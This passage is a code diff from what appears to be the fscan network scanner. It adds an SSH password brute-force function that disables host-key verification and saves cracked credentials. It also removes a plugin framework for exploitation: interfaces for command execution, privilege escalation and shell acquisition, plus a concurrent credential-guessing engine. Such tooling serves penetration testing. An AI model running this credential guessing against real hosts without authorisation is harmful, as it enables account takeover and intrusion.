+				Credential: credential,
+			}
+		}
+
+		lastErr = err
+		if err != nil {
+			// 检查是否需要重试
+			if retryErr := common.CheckErrs(err); retryErr == nil {
+				break // 不需要重试的错误
+			}
+		}
+	}
+
+	return &SshScanResult{
+		Success:    false,
+		Error:      lastErr,
+		Credential: credential,
+	}
+}
+
+// attemptSshConnection 尝试SSH连接
+func attemptSshConnection(info *common.HostInfo, username, password string, timeoutSeconds int64) (bool, error) {
+	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeoutSeconds)*time.Second)
+	defer cancel()
+
+	connChan := make(chan struct {
+		success bool
+		err     error
+	}, 1)
+
+	go func() {
+		success, err := sshConnect(info, username, password, timeoutSeconds)
+		select {
+		case <-ctx.Done():
+		case connChan <- struct {
+			success bool
+			err     error
+		}{success, err}:
+		}
+	}()
+
+	select {
+	case result := <-connChan:
+		return result.success, result.err
+	case <-ctx.Done():
+		return false, fmt.Errorf("连接超时")
+	}
+}
+
+// sshConnect 建立SSH连接并验证
+func sshConnect(info *common.HostInfo, username, password string, timeoutSeconds int64) (bool, error) {
+	auth := []ssh.AuthMethod{ssh.Password(password)}
+
+	config := &ssh.ClientConfig{
+		User: username,
+		Auth: auth,
+		HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
+			return nil
+		},
+		Timeout: time.Duration(timeoutSeconds) * time.Second,
+	}
+
+	client, err := ssh.Dial("tcp", fmt.Sprintf("%v:%v", info.Host, info.Ports), config)
+	if err != nil {
+		return false, err
+	}
+	defer client.Close()
+
+	session, err := client.NewSession()
+	if err != nil {
+		return false, err
+	}
+	defer session.Close()
+
+	return true, nil
+}
+
+// logAndSaveSuccess 记录并保存成功结果
+func logAndSaveSuccess(info *common.HostInfo, target string, result *SshScanResult) {
+	var successMsg string
+	details := map[string]interface{}{
+		"port":     info.Ports,
+		"service":  "ssh",
+		"username": result.Credential.Username,
+		"type":     "weak-password",
+	}
+
+	// 区分密钥认证和密码认证
+	if common.SshKeyPath != "" {
+		successMsg = fmt.Sprintf("SSH密钥认证成功 %s User:%v KeyPath:%v",
+			target, result.Credential.Username, common.SshKeyPath)
+		details["auth_type"] = "key"
+		details["key_path"] = common.SshKeyPath
+	} else {
+		successMsg = fmt.Sprintf("SSH密码认证成功 %s User:%v Pass:%v",
+			target, result.Credential.Username, result.Credential.Password)
+		details["auth_type"] = "password"
+		details["password"] = result.Credential.Password
+	}
+
+	common.LogSuccess(successMsg)
+
+	vulnResult := &output.ScanResult{
+		Time:    time.Now(),
+		Type:    output.TypeVuln,
+		Target:  info.Host,
+		Status:  "vulnerable",
+		Details: details,
+	}
+	common.SaveResult(vulnResult)
+}

Plugins/adapter/plugin_adapter.go

@@ -1,165 +0,0 @@
-package adapter
-
-import (
-	"context"
-	"fmt"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/common/output"
-	"github.com/shadow1ng/fscan/plugins/base"
-	"time"
-	
-	// 导入新插件以触发注册
-	_ "github.com/shadow1ng/fscan/plugins/services/mysql"
-	_ "github.com/shadow1ng/fscan/plugins/services/redis" 
-	_ "github.com/shadow1ng/fscan/plugins/services/ssh"
-)
-
-// PluginAdapter 插件适配器，将新插件架构与旧系统集成
-type PluginAdapter struct {
-	registry *base.PluginRegistry
-}
-
-// NewPluginAdapter 创建插件适配器
-func NewPluginAdapter() *PluginAdapter {
-	return &PluginAdapter{
-		registry: base.GlobalPluginRegistry,
-	}
-}
-
-// AdaptPluginScan 适配插件扫描调用
-// 将传统的插件扫描函数调用转换为新架构的插件调用
-func (a *PluginAdapter) AdaptPluginScan(pluginName string, info *common.HostInfo) error {
-	// 创建插件实例
-	plugin, err := a.registry.Create(pluginName)
-	if err != nil {
-		// 如果新架构中没有该插件，返回错误让旧系统处理
-		return fmt.Errorf("plugin %s not found in new architecture: %v", pluginName, err)
-	}
-	
-	// 初始化插件
-	if err := plugin.Initialize(); err != nil {
-		return fmt.Errorf("plugin %s initialization failed: %v", pluginName, err)
-	}
-	
-	// 设置全局超时上下文
-	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(common.GlobalTimeout)*time.Second)
-	defer cancel()
-	
-	// 执行扫描
-	result, err := plugin.Scan(ctx, info)
-	if err != nil {
-		common.LogError(fmt.Sprintf("Plugin %s scan failed: %v", pluginName, err))
-		return err
-	}
-	
-	// 如果扫描成功，记录结果
-	if result != nil && result.Success {
-		target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-		
-		// 适配器层不输出扫描结果，由插件层负责输出
-		// 这避免了重复输出的问题
-		common.LogDebug(fmt.Sprintf("插件 %s 适配成功: %s", pluginName, target))
-		
-		// 保存结果到文件
-		a.saveResult(info, result, pluginName)
-		
-		// 如果有漏洞信息，也记录下来
-		for _, vuln := range result.Vulnerabilities {
-			common.LogError(fmt.Sprintf("%s vulnerability found: %s - %s", 
-				pluginName, vuln.ID, vuln.Description))
-		}
-	}
-	
-	return nil
-}
-
-// saveResult 保存扫描结果
-func (a *PluginAdapter) saveResult(info *common.HostInfo, result *base.ScanResult, pluginName string) {
-	// 使用原有的结果保存机制
-	
-	vulnResult := &output.ScanResult{
-		Time:   time.Now(),
-		Type:   output.TypeVuln,
-		Target: info.Host,
-		Status: "vulnerable",
-		Details: map[string]interface{}{
-			"plugin": pluginName,
-			"port":   info.Ports,
-			"host":   info.Host,
-		},
-	}
-	
-	if len(result.Credentials) > 0 {
-		cred := result.Credentials[0]
-		if cred.Username != "" {
-			vulnResult.Details["username"] = cred.Username
-			vulnResult.Details["password"] = cred.Password
-			vulnResult.Details["credentials"] = fmt.Sprintf("%s:%s", cred.Username, cred.Password)
-		} else {
-			vulnResult.Details["password"] = cred.Password
-			vulnResult.Details["credentials"] = cred.Password
-		}
-	} else {
-		// 未授权访问
-		vulnResult.Details["type"] = "unauthorized"
-	}
-	
-	// 保存结果
-	common.SaveResult(vulnResult)
-}
-
-// IsPluginSupported 检查插件是否在新架构中支持
-func (a *PluginAdapter) IsPluginSupported(pluginName string) bool {
-	plugins := a.registry.GetAll()
-	for _, name := range plugins {
-		if name == pluginName {
-			return true
-		}
-	}
-	return false
-}
-
-// GetSupportedPlugins 获取新架构支持的插件列表
-func (a *PluginAdapter) GetSupportedPlugins() []string {
-	return a.registry.GetAll()
-}
-
-// GetPluginMetadata 获取插件元数据
-func (a *PluginAdapter) GetPluginMetadata(pluginName string) (*base.PluginMetadata, error) {
-	metadata := a.registry.GetMetadata(pluginName)
-	if metadata == nil {
-		return nil, fmt.Errorf("plugin %s not found", pluginName)
-	}
-	return metadata, nil
-}
-
-// =============================================================================
-// 全局适配器实例
-// =============================================================================
-
-// GlobalAdapter 全局插件适配器实例
-var GlobalAdapter = NewPluginAdapter()
-
-// =============================================================================
-// 便捷函数
-// =============================================================================
-
-// TryNewArchitecture 尝试使用新架构执行插件扫描
-// 如果新架构支持该插件，则使用新架构；否则返回false让调用方使用旧插件
-func TryNewArchitecture(pluginName string, info *common.HostInfo) bool {
-	if !GlobalAdapter.IsPluginSupported(pluginName) {
-		common.LogDebug(i18n.GetText("plugin_legacy_using", pluginName))
-		return false
-	}
-	
-	common.LogDebug(i18n.GetText("plugin_new_arch_trying", pluginName))
-	err := GlobalAdapter.AdaptPluginScan(pluginName, info)
-	if err != nil {
-		common.LogError(i18n.GetText("plugin_new_arch_fallback", pluginName, err))
-		return false
-	}
-	
-	common.LogDebug(i18n.GetText("plugin_new_arch_success", pluginName))
-	return true
-}

Plugins/base/exploiter.go

@@ -1,249 +0,0 @@
-package base
-
-import (
-	"context"
-	"fmt"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"sort"
-)
-
-// =============================================================================
-// 通用利用器基础实现
-// =============================================================================
-
-// BaseExploiter 基础利用器，提供通用的利用逻辑
-type BaseExploiter struct {
-	Name           string
-	exploitMethods []ExploitMethod
-}
-
-// NewBaseExploiter 创建基础利用器
-func NewBaseExploiter(name string) *BaseExploiter {
-	return &BaseExploiter{
-		Name:           name,
-		exploitMethods: make([]ExploitMethod, 0),
-	}
-}
-
-// AddExploitMethod 添加利用方法
-func (e *BaseExploiter) AddExploitMethod(method ExploitMethod) {
-	e.exploitMethods = append(e.exploitMethods, method)
-	
-	// 按优先级排序
-	sort.Slice(e.exploitMethods, func(i, j int) bool {
-		return e.exploitMethods[i].Priority > e.exploitMethods[j].Priority
-	})
-}
-
-// GetExploitMethods 获取支持的利用方法
-func (e *BaseExploiter) GetExploitMethods() []ExploitMethod {
-	return e.exploitMethods
-}
-
-// IsExploitSupported 检查是否支持指定的利用方法
-func (e *BaseExploiter) IsExploitSupported(exploitType ExploitType) bool {
-	for _, method := range e.exploitMethods {
-		if method.Type == exploitType {
-			return true
-		}
-	}
-	return false
-}
-
-// Exploit 执行利用操作
-func (e *BaseExploiter) Exploit(ctx context.Context, info *common.HostInfo, creds *Credential) (*ExploitResult, error) {
-	// 按优先级尝试不同的利用方法
-	for _, method := range e.exploitMethods {
-		// 检查前置条件
-		if !e.checkConditions(method.Conditions, info, creds) {
-			common.LogDebug(i18n.GetText("exploit_method_condition_not_met", method.Name))
-			continue
-		}
-		
-		common.LogDebug(i18n.GetText("exploit_method_trying", i18n.GetExploitMethodName(method.Name)))
-		
-		// 执行利用
-		result, err := method.Handler(ctx, info, creds)
-		if err != nil {
-			common.LogError(i18n.GetText("exploit_method_failed", method.Name, err))
-			continue
-		}
-		
-		if result != nil && result.Success {
-			common.LogSuccess(i18n.GetText("exploit_method_success", i18n.GetExploitMethodName(method.Name)))
-			result.Type = method.Type
-			result.Method = method.Name
-			return result, nil
-		}
-	}
-	
-	return nil, fmt.Errorf(i18n.GetText("exploit_all_methods_failed"))
-}
-
-// checkConditions 检查前置条件
-func (e *BaseExploiter) checkConditions(conditions []string, info *common.HostInfo, creds *Credential) bool {
-	for _, condition := range conditions {
-		if !e.evaluateCondition(condition, info, creds) {
-			return false
-		}
-	}
-	return true
-}
-
-// evaluateCondition 评估单个条件
-func (e *BaseExploiter) evaluateCondition(condition string, info *common.HostInfo, creds *Credential) bool {
-	switch condition {
-	case "has_credentials":
-		return creds != nil && (creds.Username != "" || creds.Password != "")
-	case "has_username_password":
-		return creds != nil && creds.Username != "" && creds.Password != ""
-	case "has_password_only":
-		return creds != nil && creds.Password != "" && creds.Username == ""
-	case "unauthorized_access":
-		return creds == nil || (creds.Username == "" && creds.Password == "")
-	default:
-		// 默认条件满足
-		return true
-	}
-}
-
-// =============================================================================
-// 常用利用方法实现
-// =============================================================================
-
-// ExploitMethodBuilder 利用方法构建器
-type ExploitMethodBuilder struct {
-	method ExploitMethod
-}
-
-// NewExploitMethod 创建利用方法构建器
-func NewExploitMethod(exploitType ExploitType, name string) *ExploitMethodBuilder {
-	return &ExploitMethodBuilder{
-		method: ExploitMethod{
-			Type:        exploitType,
-			Name:        name,
-			Priority:    5, // 默认优先级
-			Conditions:  make([]string, 0),
-		},
-	}
-}
-
-// WithDescription 设置描述
-func (b *ExploitMethodBuilder) WithDescription(desc string) *ExploitMethodBuilder {
-	b.method.Description = desc
-	return b
-}
-
-// WithPriority 设置优先级
-func (b *ExploitMethodBuilder) WithPriority(priority int) *ExploitMethodBuilder {
-	b.method.Priority = priority
-	return b
-}
-
-// WithConditions 设置前置条件
-func (b *ExploitMethodBuilder) WithConditions(conditions ...string) *ExploitMethodBuilder {
-	b.method.Conditions = conditions
-	return b
-}
-
-// WithHandler 设置处理函数
-func (b *ExploitMethodBuilder) WithHandler(handler ExploitHandler) *ExploitMethodBuilder {
-	b.method.Handler = handler
-	return b
-}
-
-// Build 构建利用方法
-func (b *ExploitMethodBuilder) Build() ExploitMethod {
-	return b.method
-}
-
-// =============================================================================
-// 利用结果处理工具
-// =============================================================================
-
-// SaveExploitResult 保存利用结果
-func SaveExploitResult(info *common.HostInfo, result *ExploitResult, pluginName string) {
-	if result == nil || !result.Success {
-		return
-	}
-
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	var message string
-	switch result.Type {
-	case ExploitWeakPassword:
-		message = i18n.GetText("exploit_weak_password_success", pluginName, target)
-	case ExploitUnauthorized:
-		message = i18n.GetText("exploit_unauthorized_success", pluginName, target)
-	case ExploitCommandExec:
-		message = i18n.GetText("exploit_command_exec_success", pluginName, target)
-	case ExploitFileWrite:
-		message = i18n.GetText("exploit_file_write_success", pluginName, target)
-	case ExploitSQLInjection:
-		message = i18n.GetText("exploit_sql_injection_success", pluginName, target)
-	case ExploitDataExtraction:
-		message = i18n.GetText("exploit_data_extraction_success", pluginName, target, i18n.GetExploitMethodName(result.Method))
-	default:
-		message = i18n.GetText("exploit_generic_success", pluginName, target, i18n.GetExploitMethodName(result.Method))
-	}
-	
-	if result.Output != "" {
-		message += i18n.GetText("exploit_with_output", result.Output)
-	}
-	
-	common.LogSuccess(message)
-	
-	// 保存文件信息
-	if len(result.Files) > 0 {
-		common.LogSuccess(i18n.GetText("exploit_files_created", result.Files))
-	}
-	
-	// 保存Shell信息
-	if result.Shell != nil {
-		common.LogSuccess(i18n.GetText("exploit_shell_obtained",
-			result.Shell.Type, result.Shell.Host, result.Shell.Port, result.Shell.User))
-	}
-}
-
-// =============================================================================
-// 常用利用工具函数
-// =============================================================================
-
-// CreateSuccessExploitResult 创建成功的利用结果
-func CreateSuccessExploitResult(exploitType ExploitType, method string) *ExploitResult {
-	return &ExploitResult{
-		Success: true,
-		Type:    exploitType,
-		Method:  method,
-		Extra:   make(map[string]interface{}),
-	}
-}
-
-// CreateFailedExploitResult 创建失败的利用结果
-func CreateFailedExploitResult(exploitType ExploitType, method string, err error) *ExploitResult {
-	return &ExploitResult{
-		Success: false,
-		Type:    exploitType,
-		Method:  method,
-		Error:   err,
-		Extra:   make(map[string]interface{}),
-	}
-}
-
-// AddOutputToResult 向结果添加输出
-func AddOutputToResult(result *ExploitResult, output string) {
-	if result.Output == "" {
-		result.Output = output
-	} else {
-		result.Output += "\n" + output
-	}
-}
-
-// AddFileToResult 向结果添加文件
-func AddFileToResult(result *ExploitResult, filename string) {
-	if result.Files == nil {
-		result.Files = make([]string, 0)
-	}
-	result.Files = append(result.Files, filename)
-}

Plugins/base/interfaces.go

@@ -1,162 +0,0 @@
-package base
-
-import (
-	"context"
-	"github.com/shadow1ng/fscan/common"
-)
-
-// =============================================================================
-// 核心接口定义
-// =============================================================================
-
-// Scanner 扫描器接口 - 负责发现和识别服务
-type Scanner interface {
-	// Scan 执行扫描操作
-	Scan(ctx context.Context, info *common.HostInfo) (*ScanResult, error)
-	
-	// GetName 获取扫描器名称
-	GetName() string
-	
-	// GetCapabilities 获取扫描器支持的能力
-	GetCapabilities() []Capability
-}
-
-// Exploiter 利用器接口 - 负责各种攻击利用
-type Exploiter interface {
-	// Exploit 执行利用操作
-	Exploit(ctx context.Context, info *common.HostInfo, creds *Credential) (*ExploitResult, error)
-	
-	// GetExploitMethods 获取支持的利用方法
-	GetExploitMethods() []ExploitMethod
-	
-	// IsExploitSupported 检查是否支持指定的利用方法
-	IsExploitSupported(method ExploitType) bool
-}
-
-// Plugin 完整插件接口 - 组合扫描和利用功能
-type Plugin interface {
-	Scanner
-	Exploiter
-	
-	// Initialize 初始化插件
-	Initialize() error
-	
-	// GetMetadata 获取插件元数据
-	GetMetadata() *PluginMetadata
-}
-
-// =============================================================================
-// 支持类型定义
-// =============================================================================
-
-// Capability 插件能力类型
-type Capability string
-
-const (
-	CapWeakPassword      Capability = "weak_password"      // 弱密码检测
-	CapUnauthorized      Capability = "unauthorized"       // 未授权访问
-	CapSQLInjection      Capability = "sql_injection"      // SQL注入
-	CapCommandExecution  Capability = "command_execution"  // 命令执行
-	CapFileUpload        Capability = "file_upload"        // 文件上传
-	CapFileWrite         Capability = "file_write"         // 文件写入
-	CapPrivilegeEsc      Capability = "privilege_esc"      // 提权
-	CapDataExtraction    Capability = "data_extraction"    // 数据提取
-	CapDenialOfService   Capability = "denial_of_service"  // 拒绝服务
-	CapInformationLeak   Capability = "information_leak"   // 信息泄露
-)
-
-// ExploitType 利用类型
-type ExploitType string
-
-const (
-	ExploitWeakPassword    ExploitType = "weak_password"
-	ExploitUnauthorized    ExploitType = "unauthorized"  
-	ExploitSQLInjection    ExploitType = "sql_injection"
-	ExploitCommandExec     ExploitType = "command_exec"
-	ExploitFileWrite       ExploitType = "file_write"
-	ExploitPrivilegeEsc    ExploitType = "privilege_esc"
-	ExploitDataExtraction  ExploitType = "data_extraction"
-)
-
-// ExploitMethod 利用方法定义
-type ExploitMethod struct {
-	Type        ExploitType             // 利用类型
-	Name        string                  // 方法名称
-	Description string                  // 描述
-	Priority    int                     // 优先级（1-10，10最高）
-	Conditions  []string                // 前置条件
-	Handler     ExploitHandler          // 处理函数
-}
-
-// ExploitHandler 利用处理函数类型
-type ExploitHandler func(ctx context.Context, info *common.HostInfo, creds *Credential) (*ExploitResult, error)
-
-// =============================================================================
-// 数据结构定义
-// =============================================================================
-
-// PluginMetadata 插件元数据
-type PluginMetadata struct {
-	Name        string       // 插件名称
-	Version     string       // 版本
-	Author      string       // 作者
-	Description string       // 描述
-	Category    string       // 分类：service/web/local
-	Ports       []int        // 默认端口
-	Protocols   []string     // 支持的协议
-	Tags        []string     // 标签
-}
-
-// Credential 通用凭据结构
-type Credential struct {
-	Username    string            // 用户名
-	Password    string            // 密码
-	Domain      string            // 域名（用于AD等）
-	KeyData     []byte            // 密钥数据（SSH私钥等）
-	Token       string            // 令牌
-	Extra       map[string]string // 扩展字段
-}
-
-// ScanResult 扫描结果
-type ScanResult struct {
-	Success     bool                   // 是否成功
-	Error       error                  // 错误信息
-	Service     string                 // 服务类型
-	Version     string                 // 版本信息
-	Banner      string                 // 服务横幅
-	Credentials []*Credential          // 发现的凭据
-	Vulnerabilities []Vulnerability    // 发现的漏洞
-	Extra       map[string]interface{} // 扩展信息
-}
-
-// ExploitResult 利用结果
-type ExploitResult struct {
-	Success     bool                   // 是否成功
-	Error       error                  // 错误信息
-	Type        ExploitType            // 利用类型
-	Method      string                 // 利用方法
-	Output      string                 // 命令输出或结果
-	Files       []string               // 创建/修改的文件
-	Shell       *ShellInfo             // 获得的Shell信息
-	Data        map[string]interface{} // 提取的数据
-	Extra       map[string]interface{} // 扩展信息
-}
-
-// Vulnerability 漏洞信息
-type Vulnerability struct {
-	ID          string   // 漏洞ID (CVE等)
-	Name        string   // 漏洞名称
-	Severity    string   // 严重程度
-	Description string   // 描述
-	References  []string // 参考链接
-}
-
-// ShellInfo Shell信息
-type ShellInfo struct {
-	Type        string // Shell类型：reverse/bind/webshell
-	Host        string // 连接主机
-	Port        int    // 连接端口
-	User        string // 运行用户
-	OS          string // 操作系统
-	Privileges  string // 权限级别
-}

Plugins/base/plugin.go

@@ -1,259 +0,0 @@
-package base
-
-import (
-	"context"
-	"fmt"
-	"time"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-)
-
-// =============================================================================
-// 完整插件基础实现
-// =============================================================================
-
-// BasePlugin 基础插件实现，组合扫描和利用功能
-type BasePlugin struct {
-	*BaseScanner
-	*BaseExploiter
-	metadata    *PluginMetadata
-	initialized bool
-}
-
-// NewBasePlugin 创建基础插件
-func NewBasePlugin(metadata *PluginMetadata) *BasePlugin {
-	return &BasePlugin{
-		BaseScanner:  NewBaseScanner(metadata.Name, metadata),
-		BaseExploiter: NewBaseExploiter(metadata.Name),
-		metadata:     metadata,
-		initialized:  false,
-	}
-}
-
-// Initialize 初始化插件
-func (p *BasePlugin) Initialize() error {
-	if p.initialized {
-		return nil
-	}
-	
-	// 执行插件特定的初始化逻辑
-	common.LogDebug(i18n.GetText("plugin_init", p.metadata.Name))
-	
-	p.initialized = true
-	return nil
-}
-
-// GetMetadata 获取插件元数据
-func (p *BasePlugin) GetMetadata() *PluginMetadata {
-	return p.metadata
-}
-
-// =============================================================================
-// 通用插件实现模板
-// =============================================================================
-
-// ServicePlugin 服务插件模板 - 提供常见的服务扫描模式
-type ServicePlugin struct {
-	*BasePlugin
-	credentialScanner CredentialScanner
-	serviceConnector  ServiceConnector
-}
-
-// ServiceConnector 服务连接器接口
-type ServiceConnector interface {
-	// Connect 连接到服务
-	Connect(ctx context.Context, info *common.HostInfo) (interface{}, error)
-	
-	// Authenticate 认证
-	Authenticate(ctx context.Context, conn interface{}, cred *Credential) error
-	
-	// Close 关闭连接
-	Close(conn interface{}) error
-}
-
-// NewServicePlugin 创建服务插件
-func NewServicePlugin(metadata *PluginMetadata, connector ServiceConnector) *ServicePlugin {
-	plugin := &ServicePlugin{
-		BasePlugin:       NewBasePlugin(metadata),
-		serviceConnector: connector,
-	}
-	
-	// 设置自己为凭据扫描器
-	plugin.credentialScanner = plugin
-	
-	return plugin
-}
-
-// Scan 服务扫描实现
-func (p *ServicePlugin) Scan(ctx context.Context, info *common.HostInfo) (*ScanResult, error) {
-	// 检查是否禁用暴力破解
-	if common.DisableBrute {
-		return &ScanResult{
-			Success: false,
-			Error:   fmt.Errorf(i18n.GetText("plugin_brute_disabled")),
-		}, nil
-	}
-
-	// 生成凭据列表
-	credentials := p.generateCredentials()
-	if len(credentials) == 0 {
-		return &ScanResult{
-			Success: false,
-			Error:   fmt.Errorf(i18n.GetText("plugin_no_credentials")),
-		}, nil
-	}
-
-	// 执行并发扫描
-	config := &ConcurrentScanConfig{
-		MaxConcurrent: common.ModuleThreadNum,
-		Timeout:       time.Duration(common.Timeout) * time.Second,
-		MaxRetries:    common.MaxRetries,
-	}
-
-	return ConcurrentCredentialScan(ctx, p.credentialScanner, info, credentials, config)
-}
-
-// ScanCredential 实现CredentialScanner接口
-func (p *ServicePlugin) ScanCredential(ctx context.Context, info *common.HostInfo, cred *Credential) (*ScanResult, error) {
-	// 连接到服务
-	conn, err := p.serviceConnector.Connect(ctx, info)
-	if err != nil {
-		return &ScanResult{
-			Success: false,
-			Error:   fmt.Errorf("连接失败: %v", err),
-		}, nil
-	}
-	defer p.serviceConnector.Close(conn)
-
-	// 尝试认证
-	err = p.serviceConnector.Authenticate(ctx, conn, cred)
-	if err != nil {
-		return &ScanResult{
-			Success: false,
-			Error:   fmt.Errorf("认证失败: %v", err),
-		}, nil
-	}
-
-	// 认证成功
-	result := &ScanResult{
-		Success:     true,
-		Service:     p.metadata.Name,
-		Credentials: []*Credential{cred},
-		Extra:       make(map[string]interface{}),
-	}
-
-	return result, nil
-}
-
-// generateCredentials 生成凭据列表（需要子类重写）
-func (p *ServicePlugin) generateCredentials() []*Credential {
-	// 默认实现：从通用字典生成
-	serviceName := p.metadata.Name
-	usernames := common.Userdict[serviceName]
-	if len(usernames) == 0 {
-		usernames = []string{"admin", "root", serviceName}
-	}
-	
-	return GenerateCredentials(usernames, common.Passwords)
-}
-
-// GetServiceConnector 获取服务连接器（提供给子插件访问）
-func (p *ServicePlugin) GetServiceConnector() ServiceConnector {
-	return p.serviceConnector
-}
-
-// =============================================================================
-// 插件工厂
-// =============================================================================
-
-// PluginFactory 插件工厂接口
-type PluginFactory interface {
-	CreatePlugin() Plugin
-	GetMetadata() *PluginMetadata
-}
-
-// SimplePluginFactory 简单插件工厂
-type SimplePluginFactory struct {
-	metadata *PluginMetadata
-	creator  func() Plugin
-}
-
-// NewSimplePluginFactory 创建简单插件工厂
-func NewSimplePluginFactory(metadata *PluginMetadata, creator func() Plugin) *SimplePluginFactory {
-	return &SimplePluginFactory{
-		metadata: metadata,
-		creator:  creator,
-	}
-}
-
-// CreatePlugin 创建插件实例
-func (f *SimplePluginFactory) CreatePlugin() Plugin {
-	return f.creator()
-}
-
-// GetMetadata 获取插件元数据
-func (f *SimplePluginFactory) GetMetadata() *PluginMetadata {
-	return f.metadata
-}
-
-// =============================================================================
-// 插件注册管理器
-// =============================================================================
-
-// PluginRegistry 插件注册表
-type PluginRegistry struct {
-	factories map[string]PluginFactory
-}
-
-// NewPluginRegistry 创建插件注册表
-func NewPluginRegistry() *PluginRegistry {
-	return &PluginRegistry{
-		factories: make(map[string]PluginFactory),
-	}
-}
-
-// Register 注册插件工厂
-func (r *PluginRegistry) Register(name string, factory PluginFactory) {
-	r.factories[name] = factory
-}
-
-// Create 创建插件实例
-func (r *PluginRegistry) Create(name string) (Plugin, error) {
-	factory, exists := r.factories[name]
-	if !exists {
-		return nil, fmt.Errorf("插件 %s 未注册", name)
-	}
-	
-	plugin := factory.CreatePlugin()
-	if err := plugin.Initialize(); err != nil {
-		return nil, fmt.Errorf("插件初始化失败: %v", err)
-	}
-	
-	return plugin, nil
-}
-
-// GetAll 获取所有注册的插件名称
-func (r *PluginRegistry) GetAll() []string {
-	names := make([]string, 0, len(r.factories))
-	for name := range r.factories {
-		names = append(names, name)
-	}
-	return names
-}
-
-// GetMetadata 获取插件元数据
-func (r *PluginRegistry) GetMetadata(name string) *PluginMetadata {
-	factory, exists := r.factories[name]
-	if !exists {
-		return nil
-	}
-	return factory.GetMetadata()
-}
-
-// GetFactory 获取插件工厂
-func (r *PluginRegistry) GetFactory(name string) PluginFactory {
-	return r.factories[name]
-}
-
-// 全局插件注册表
-var GlobalPluginRegistry = NewPluginRegistry()

Plugins/base/scanner.go

@@ -1,309 +0,0 @@
-package base
-
-import (
-	"context"
-	"fmt"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"strings"
-	"sync"
-	"time"
-)
-
-// =============================================================================
-// 通用扫描器基础实现
-// =============================================================================
-
-// BaseScanner 基础扫描器，提供通用的扫描逻辑
-type BaseScanner struct {
-	Name         string
-	metadata     *PluginMetadata
-	capabilities []Capability
-}
-
-// NewBaseScanner 创建基础扫描器
-func NewBaseScanner(name string, metadata *PluginMetadata) *BaseScanner {
-	return &BaseScanner{
-		Name:     name,
-		metadata: metadata,
-	}
-}
-
-// GetName 获取扫描器名称
-func (s *BaseScanner) GetName() string {
-	return s.Name
-}
-
-// GetCapabilities 获取扫描器支持的能力
-func (s *BaseScanner) GetCapabilities() []Capability {
-	return s.capabilities
-}
-
-// SetCapabilities 设置扫描器能力
-func (s *BaseScanner) SetCapabilities(caps []Capability) {
-	s.capabilities = caps
-}
-
-// GetMetadata 获取插件元数据
-func (s *BaseScanner) GetMetadata() *PluginMetadata {
-	return s.metadata
-}
-
-// =============================================================================
-// 通用并发扫描框架
-// =============================================================================
-
-// ConcurrentScanConfig 并发扫描配置
-type ConcurrentScanConfig struct {
-	MaxConcurrent int           // 最大并发数
-	Timeout       time.Duration // 单次扫描超时
-	MaxRetries    int           // 最大重试次数
-	RetryDelay    time.Duration // 重试延迟
-}
-
-// CredentialScanner 凭据扫描器接口
-type CredentialScanner interface {
-	// ScanCredential 扫描单个凭据
-	ScanCredential(ctx context.Context, info *common.HostInfo, cred *Credential) (*ScanResult, error)
-}
-
-// ConcurrentCredentialScan 并发凭据扫描通用实现
-func ConcurrentCredentialScan(
-	ctx context.Context,
-	scanner CredentialScanner,
-	info *common.HostInfo,
-	credentials []*Credential,
-	config *ConcurrentScanConfig,
-) (*ScanResult, error) {
-	
-	if len(credentials) == 0 {
-		return nil, fmt.Errorf("没有提供凭据")
-	}
-
-	// 设置默认配置
-	if config == nil {
-		config = &ConcurrentScanConfig{
-			MaxConcurrent: 10,
-			Timeout:       time.Duration(common.Timeout) * time.Second,
-			MaxRetries:    common.MaxRetries,
-			RetryDelay:    500 * time.Millisecond,
-		}
-	}
-
-	// 限制并发数
-	maxConcurrent := config.MaxConcurrent
-	if maxConcurrent <= 0 {
-		maxConcurrent = 10
-	}
-	if maxConcurrent > len(credentials) {
-		maxConcurrent = len(credentials)
-	}
-
-	// 创建工作池
-	var wg sync.WaitGroup
-	resultChan := make(chan *ScanResult, 1)
-	workChan := make(chan *Credential, maxConcurrent)
-	scanCtx, scanCancel := context.WithCancel(ctx)
-	defer scanCancel()
-
-	// 启动工作协程
-	for i := 0; i < maxConcurrent; i++ {
-		wg.Add(1)
-		go func() {
-			defer wg.Done()
-			for credential := range workChan {
-				select {
-				case <-scanCtx.Done():
-					return
-				default:
-					// 开始监控连接
-					target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-					monitor := common.GetConcurrencyMonitor()
-					monitor.StartConnection("credential", target)
-					
-					result := scanCredentialWithRetry(scanCtx, scanner, info, credential, config)
-					
-					// 完成连接监控
-					monitor.FinishConnection("credential", target)
-					
-					if result != nil && result.Success {
-						select {
-						case resultChan <- result:
-							scanCancel() // 找到有效凭据，取消其他工作
-						default:
-						}
-						return
-					}
-				}
-			}
-		}()
-	}
-
-	// 发送工作
-	go func() {
-		for _, cred := range credentials {
-			select {
-			case <-scanCtx.Done():
-				break
-			default:
-				workChan <- cred
-			}
-		}
-		close(workChan)
-	}()
-
-	// 等待结果或完成
-	go func() {
-		wg.Wait()
-		close(resultChan)
-	}()
-
-	// 获取结果
-	select {
-	case result, ok := <-resultChan:
-		if ok && result != nil && result.Success {
-			return result, nil
-		}
-		return nil, fmt.Errorf(i18n.GetText("plugin_all_creds_failed"))
-	case <-ctx.Done():
-		scanCancel()
-		return nil, ctx.Err()
-	}
-}
-
-// scanCredentialWithRetry 带重试的单凭据扫描
-func scanCredentialWithRetry(
-	ctx context.Context,
-	scanner CredentialScanner,
-	info *common.HostInfo,
-	cred *Credential,
-	config *ConcurrentScanConfig,
-) *ScanResult {
-	
-	for retry := 0; retry < config.MaxRetries; retry++ {
-		select {
-		case <-ctx.Done():
-			return &ScanResult{
-				Success: false,
-				Error:   ctx.Err(),
-			}
-		default:
-			if retry > 0 {
-				time.Sleep(config.RetryDelay)
-			}
-
-			// 创建独立的超时上下文
-			connCtx, cancel := context.WithTimeout(ctx, config.Timeout)
-			result, err := scanner.ScanCredential(connCtx, info, cred)
